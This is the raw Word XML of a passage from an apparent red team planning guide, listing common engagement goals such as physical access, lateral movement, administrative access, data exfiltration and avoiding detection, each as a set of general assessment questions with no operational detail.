        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-993"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475BC07B" wp14:editId="5A690053">
            <wp:extent cx="7090054" cy="35128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133148" cy="3534171"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C660657" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-993"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEBEAF1" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00BB134D" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RED TEAM ENGAGEMENT GOAL PLANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27328C62" w14:textId="32EEEF50" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
        <w:t xml:space="preserve">Creating and deciding Red Team engagement goals can be difficult. This is especially true for organizations new to Red Teaming. Whether you are on the delivery or receiving end of a Red Team engagement, the solid goals must be decided to have successful Red Team engagement. This document provides a list of common goals that work well in most Red Team engagements. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>They can be used as a starting point for planning. Modify and customize as needed. Each goal has a list of questions that can be answered as a narrative from the observations and measurements during a Red Team engagement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7632A2C0" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="193C47"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEF9FD"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18EFFF23" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>COMMON GOALS: MEASURE AND OBSERVE ...</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:anchor="common-goals-measure-and-observe-" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A1B9D82" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>A THREAT’S ABILITY TO ACCESS TO COMMON AND RESTRICTED AREAS (PHYSICAL)</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:anchor="a-threats-ability-to-access-to-common-and-restricted-areas-physical" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20765C1F" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What ability does a threat have to access common areas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B8C735" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What ability does a threat have to access restricted areas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF3411" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Can a threat use access gained to enable cyber capabilities?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D34BC" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What impacts can a threat have through gained access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771CF1DA" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>A THREAT’S ABILITY TO ACCESS KEY/CRITICAL SYSTEMS</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:anchor="a-threats-ability-to-access-keycritical-systems" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C772538" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Can a threat access </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>key/critical systems</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB93E8" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What impacts can a threat have on key/critical systems?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC61ED3" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>A THREAT’S ABILITY TO MOVE FREELY THROUGHOUT A NETWORK</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:anchor="a-threats-ability-to-move-freely-throughout-a-network" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E993BBA" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What ability does a threat have to freely move throughout a network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17951575" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>A THREAT’S ABILITY TO GAIN DOMAIN WIDE AND LOCAL ADMINISTRATIVE ACCESS?</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:anchor="a-threats-ability-to-gain-domain-wide-and-local-administrative-access" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D64D689" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What ability does a threat have to gain local administrative access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308725FB" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What ability does a threat have to gain domain administrative access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8CA5A" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What ability does a threat have to gain elevated access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107B310" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>A THREAT’S ABILITY TO ACCESS OR IDENTIFY SENSITIVE INFORMATION</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:anchor="a-threats-ability-to-access-or-identify-sensitive-information" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F6D5AE2" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What ability does a threat have to access sensitive information?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144637F" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What ability does a threat have to identify sensitive information?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9DF59" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>A THREAT’S ABILITY TO EXFILTRATE DATA OUTSIDE AN ORGANIZATION</w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:anchor="a-threats-ability-to-exfiltrate-data-outside-an-organization" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AEA1580" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What ability does a threat have to exfiltrate data outside an organization?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147A3DF" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How much data must be exfiltrated to impact an organization?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746669B7" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>A THREAT’S ABILITY TO ACT UNDETECTED FOR A GIVEN TIME FRAME</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:anchor="a-threats-ability-to-act-undetected-for-a-given-time-frame" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00FE2659">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17F28B2B" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How long can a threat go undetected?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED1A37F" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE2659">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Can a threat achieve its goals undetected?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A25CA" w14:textId="77777777" w:rsidR="00FE2659" w:rsidRPr="00FE2659" w:rsidRDefault="00FE2659" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
